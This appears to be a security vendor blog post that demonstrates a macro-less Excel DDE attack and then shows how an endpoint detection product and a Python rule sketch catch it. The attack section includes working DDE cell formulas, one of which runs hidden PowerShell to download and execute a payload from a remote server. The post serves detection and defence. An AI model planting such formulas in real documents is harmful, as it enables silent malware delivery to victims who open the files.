There has recently been a resurgence of a method for executing commands via malicious Excel files (and other Office documents) without the need for macros.
The method uses Dynamic Data Exchange (DDE). What makes it interesting is that, even though it does cause prompt messages to appear, it doesn't use macros, so it is less likely to be detected and blocked, and users are more likely to accept the prompts. In addition, because this is a "feature" rather than a vulnerability, it is not something that will be patched, and it cannot easily be prevented or blocked.
We will see how to perform a sample attack using DDE and then how easily it can be detected with RSA NetWitness Endpoint.
DDE Sample Attack
To execute a command using DDE, all we have to do is create an Excel file and use the following formula in one of the cells:
=cmd|' /c notepad'!A0
Once the user opens the file and accepts the prompts, notepad.exe will be launched.
To make the attack more interesting, we want to use the same method in conjunction with PowerShell to download and execute our payload (the payload “YGH.exe” is hosted on the “192.168.1.3” server):
=cmd|'/c powershell.exe -w hidden (New-Object System.Net.WebClient).DownloadFile(\"http://192.168.1.3/YGH.exe\",\"c:\\Users\Public\\YGH.exe\");Start-Process \"c:\\Users\\Public\\YGH.exe\"'!A0
Once the victim opens the file, this is what they see:
After accepting the first warning message, a second warning appears:
And finally the payload gets downloaded and executed:
In a real-life scenario, the malware would have done something stealthier, or provided remote access to the attacker, instead of displaying a message.
Detection Using RSA NetWitness Endpoint (EDR)
Now, from the RSA NetWitness Endpoint view, this would be detected very easily.
- IIOCs are triggered for Office running PowerShell and for PowerShell downloading content. These could be used to generate real-time alerts via email and/or syslog so that the attack is noticed at an early stage.
- Excel is executed
- Excel launches "cmd.exe". From the command arguments we can see that cmd is used to launch PowerShell to download and execute a file called "YGH.exe" from the "192.168.1.3" server.
- PowerShell saves the YGH.exe file to disk
- PowerShell executes the YGH.exe file
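As an added illustration, not code from the original post or from the NetWitness product, the Python below models the process-tree rules behind the IIOCs listed above and runs them over constructed process-creation events that reproduce the Excel -> cmd.exe -> PowerShell -> YGH.exe chain; the rule names, event fields and the download indicator pattern are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# Assumed download indicators; tuned to the WebClient one-liner shown above.
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|net\.webclient|invoke-webrequest", re.I)

@dataclass
class ProcEvent:          # minimal process-creation record (hypothetical schema)
    pid: int
    ppid: int
    image: str            # executable basename as reported by the sensor
    cmdline: str

def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Walk ppid links upward; returns lowercase image names, nearest parent first."""
    chain, seen, cur = [], set(), by_pid.get(ev.ppid)
    while cur and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur.image.lower())
        cur = by_pid.get(cur.ppid)
    return chain

def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule, pid) hits mirroring the behaviours the post describes."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        img, anc = e.image.lower(), ancestors(e, by_pid)
        if img in SHELLS and anc and anc[0] in OFFICE:
            hits.append(("office_spawns_shell", e.pid))
        if img == "powershell.exe" and any(a in OFFICE for a in anc):
            hits.append(("office_runs_powershell", e.pid))      # via cmd.exe or direct
        if img == "powershell.exe" and DOWNLOAD_RE.search(e.cmdline):
            hits.append(("powershell_downloads_content", e.pid))
        if anc and anc[0] == "powershell.exe" and img not in SHELLS | OFFICE:
            hits.append(("powershell_executes_dropped_file", e.pid))
    return hits

# Constructed sample events (not real telemetry); pid 600 is a benign control.
SAMPLE = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "EXCEL.EXE", "EXCEL.EXE invoice.xlsx"),
    ProcEvent(300, 200, "cmd.exe", "cmd /c powershell.exe -w hidden (New-Object System.Net.WebClient).DownloadFile(...)"),
    ProcEvent(400, 300, "powershell.exe", "powershell.exe -w hidden (New-Object System.Net.WebClient)"
              ".DownloadFile(\"http://192.168.1.3/YGH.exe\",\"c:\\Users\\Public\\YGH.exe\")"),
    ProcEvent(500, 400, "YGH.exe", "c:\\Users\\Public\\YGH.exe"),
    ProcEvent(600, 100, "powershell.exe", "powershell.exe -File backup.ps1"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE):
        print(f"{rule}: pid {pid}")
```

Running it reports four hits on pids 300, 400 (twice) and 500, and nothing for the benign PowerShell launched directly from Explorer.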
This shows how an attack vector that can easily bypass traditional preventive solutions can be detected by RSA NetWitness Endpoint based on the monitored behavior of the user's workstation.
It was detected even though Excel is approved, validly signed software and the malware itself performed no malicious activity (it only displayed a message to the victim). This demonstrates early, behavior-based detection before any actual negative impact occurs.